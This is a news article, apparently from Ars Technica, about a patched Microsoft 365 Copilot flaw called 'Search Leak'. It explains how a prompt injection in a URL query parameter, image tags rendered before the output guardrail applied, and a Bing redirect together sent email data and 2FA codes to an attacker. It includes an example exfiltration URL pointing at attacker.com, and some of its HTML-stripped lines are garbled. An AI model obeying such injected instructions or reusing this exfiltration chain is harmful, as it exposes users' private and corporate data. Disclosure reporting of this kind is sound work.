Critical Copilot vulnerability allowed hackers to seal 2FA code from users - Ars Technica

Overview

Critical Copilot vulnerability allowed hackers to seal 2FA code from users

Search Leak exploit shows why the industry’s approach to LLM security fails over and over.

Details

Last Tuesday, Microsoft patched a vulnerability it rated as max critical in its M365 Copilot AI platform. On Monday, the researchers who discovered the vulnerability and reported it to Microsoft revealed how their proof-of-concept exploit could retrieve 2FA codes and other sensitive data from emails accessible to Copilot.

Microsoft and other LLM providers have been unable to prevent their products from complying with malicious requests to reveal data. The root cause: AI bots are unable to distinguish between instructions provided by users and those snuck into third-party content the models are summarizing, drafting responses to, or using to perform other actions on behalf of the user. With no way to secure this crucial boundary, Microsoft and its peers are left to erect complicated and ad hoc guardrails designed to rein in the consequences of this incurable gullibility.

One guardrail built into Copilot and most other LLMs prevents them from submitting web forms, sending emails, and taking similar actions that can be used to exfiltrate data from the user. To work around this, LLM hackers turned to markup language, which, among other things, allows users to add formatting elements such as headings, lists, and links to text without the need for HTML tags. Another workaround is to wrap sensitive data inside HTML tags such as

and

. In either case, a web request showing the data hits the attacker’s web server, where the secret information is captured in logs.

One Microsoft guardrail wraps Copilot output in blocks so the browser treats it as straight text. Another is to restrict the sites Copilot is permitted to visit without explicit approval. While Copilot has blanket permission to send requests to Microsoft domains, guardrails restrict requests to untrusted sites.


Security firm Varonis devised an exploit chain that was able to catapult over these guardrails. The first element was what the researchers call a Parameter-to-Prompt Injection. The parameter in this case is the q in a URL, which is used to flag a query that has been included. The Parameter-to-Prompt Injection is a close relative of the prompt injection. The difference is that the malicious command is located in the query parameter, rather than in an email or other piece of untrusted content.
To bring about the Parameter-to-Prompt Injection an attacker sends the target an email that contains the URL with the syntax https://m 365.cloud.microsoft/search/?auth=2&origindomain=microsoft 365&q=. The field contains an instruction. Copilot readily complied.
“The search functionality is exactly what attackers need, because even with limited capabilities, a user with access to critical information is enough,” the researchers wrote Monday. “To exfiltrate the data, an attacker crafts a URL that tells Copilot to ‘Search the user’s emails,’ extract the title, and embed it in an image URL.” The victim doesn’t type anything. They click a link, and Copilot does the rest.
Normally, the guardrail wrapping output in  blocks would kick in. But the researchers discovered that the protection fires only after the “thinking” phase. Prior to that, Copilot generated its response using raw HTML, which is temporarily rendered in the browser DOM.

Copilot starts streaming its response, which includes an 
 tag
The browser sees the , renders it, and fires off an HTTP request to the src URL
Copilot finishes generating. The guardrail wraps everything in 
Too late! The request already left.

Copilot starts streaming its response, which includes an 
 tag
The browser sees the 
, renders it, and fires off an HTTP request to the src URL
Copilot finishes generating. The guardrail wraps everything in 

The researchers now had an image request firing from the target’s browser. The problem, as noted earlier, is that Copilot won’t send image requests to most websites. To scale this guardrail, the exploit chain used Microsoft’s Bing search engine as a trampoline of sorts. Per the Copilot content security policy, Bing is among the sites permitted to send such requests. Bing would then send the request to the attacker-controlled domain that was included in the request. The request looked something like this:
https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png
“Since Search Leak targets the Enterprise tier of Microsoft, the blast radius isn’t limited to personal data—it’s able to surface anything the user has access to inside the organization including emails, meeting invites and notes,” company researchers wrote. “Share Point documents, One Drive files, and other indexed business content. Depending on how M365 is connected to the environment, the blast radius could extend even wider.”
As noted, Microsoft fixed the vulnerabilities that Search Leak exploited on Tuesday. With no known way to fix the underlying cause of such SNAFUs, however, attackers will inevitably find new ways to circumvent the newly constructed guardrails, and the process will repeat all over again.


         20 years of Intel Macs: Why Apple switched, and why it switched again



         Russia appears set to finally address long-term, serious space station cracks



         Users cry foul after AMD stripped memory crypto from its consumer CPUs



         Good news—we have extra time before the Sun ends life on Earth



         Verizon sent man a refurbished phone with MDM, then deleted his data remotely



Ars Technica has been separating the signal from
the noise for over 25 years. With our unique combination of
technical savvy and wide-ranging interest in the technological arts
and sciences, Ars is the trusted source in a sea of information. After
all, you don’t need to know everything, only what’s important.
Key Takeaways


Critical Copilot vulnerability allowed hackers to seal 2FA code from users


Search Leak exploit shows why the industry’s approach to LLM security fails over and over


Last Tuesday, Microsoft patched a vulnerability it rated as max critical in its M365 Copilot AI platform


Microsoft and other LLM providers have been unable to prevent their products from complying with malicious requests to reveal data


One guardrail built into Copilot and most other LLMs prevents them from submitting web forms, sending emails, and taking similar actions that can be used to exfiltrate data from the user